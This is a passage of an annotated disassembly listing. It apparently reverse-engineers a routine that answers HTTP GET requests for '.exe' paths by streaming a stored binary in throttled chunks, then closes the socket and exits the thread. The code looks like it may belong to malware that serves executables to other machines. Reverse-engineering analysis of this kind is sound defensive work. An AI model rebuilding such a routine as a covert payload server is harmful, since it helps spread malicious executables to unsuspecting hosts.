        pop ecx
        jz loc_31001BCE                     ; not a GET -> short reply
        lea eax, [ ebp + var_100 ]
        push offset a_exe ; ".exe"
        push eax
        call esi ; strstr
        pop ecx
        test eax, eax
        pop ecx
        jz loc_31001BCE                     ; no ".exe" -> short reply
        mov esi, dword_31001168             ; esi = send
        ; send(s, "HTTP/1.1 200 OK\r\nContent-Type: applicat...", 3Dh, 0)
        push 0
        push 3Dh
        push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent - Type: applicat"...
        push ebx
        call esi ; send
        ; wsprintfA(var_200, "Content-Length: %u\r\n\r\n", dword_31004FC0)
        push dword_31004FC0
        lea eax, [ ebp + var_200 ]
        push offset aContentLengthU ; "Content - Length: %u\r\n\r\n"
        push eax
        call dword_3100111C ; wsprintfA
        add esp, 0Ch
        lea eax, [ ebp + var_200 ]
        push 0
        push eax
        call sub_31002B92 ; strlen
        pop ecx
        push eax
        lea eax, [ ebp + var_200 ]
        push eax
        push ebx
        call esi ; send
    loc_31001B8D:                           ; CODE XREF: sub_31001ADF + E8j
        ; chunk = min(total - sent, 1000h)
        mov eax, dword_31004FC0
        mov ecx, 1000h
        sub eax, edi
        cmp eax, ecx
        jb short loc_31001B9F
        mov eax, ecx
    loc_31001B9F:                           ; CODE XREF: sub_31001ADF + BCj
        test eax, eax
        jz short loc_31001BEC               ; nothing left -> finish
        ; send(s, dword_31004FB8 + sent, chunk, 0)
        push 0
        push eax
        mov eax, dword_31004FB8
        add eax, edi
        push eax
        push ebx
        call esi ; send
        cmp eax, 0FFFFFFFFh
        jz short loc_31001BC9
        cmp eax, 1000h
        jb short loc_31001BEC               ; short send: treated as the last chunk
        push 64h
        add edi, eax                        ; sent += chunk
        call dword_31001080 ; Sleep         ; 100 ms between chunks
        jmp short loc_31001B8D
    ; ---------------------------------------------------------------------------
    loc_31001BC9:                           ; CODE XREF: sub_31001ADF + D5j
        push 2                              ; return 2 (socket left open)
    loc_31001BCB:                           ; CODE XREF: sub_31001ADF + 2Cj
        pop eax
        jmp short loc_31001C11
    ; ---------------------------------------------------------------------------
    loc_31001BCE:                           ; CODE XREF: sub_31001ADF + 49j ; sub_31001ADF + 61j
        ; Non-matching request: bare 200 OK + 3-byte body
        mov esi, dword_31001168
        push 0
        push 15h
        push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
        push ebx
        call esi ; send
        push 0
        push 3
        push offset dword_31004A80
        push ebx
        call esi ; send
    loc_31001BEC:                           ; CODE XREF: sub_31001ADF + C2j ; sub_31001ADF + DCj
        push 7D0h
        call dword_31001080 ; Sleep         ; 2 s grace before teardown
        push 2                              ; SD_BOTH
        push ebx
        call dword_31001170 ; shutdown
        push ebx
        call dword_31001174 ; closesocket
        push 0
        call dword_310010BC ; ExitThread    ; does not return
        xor eax, eax                        ; unreachable
    loc_31001C11:                           ; CODE XREF: sub_31001ADF + EDj
        pop edi
        pop esi
        pop ebx
        leave
        retn 4
    sub_31001ADF endp

    ########################## SUBROUTINE ##########################

    sub_31001C18 proc near ; DATA XREF: sub_31001E06 + DEo var_130 = byte ptr - 130h var_28 = byte ptr - 28h<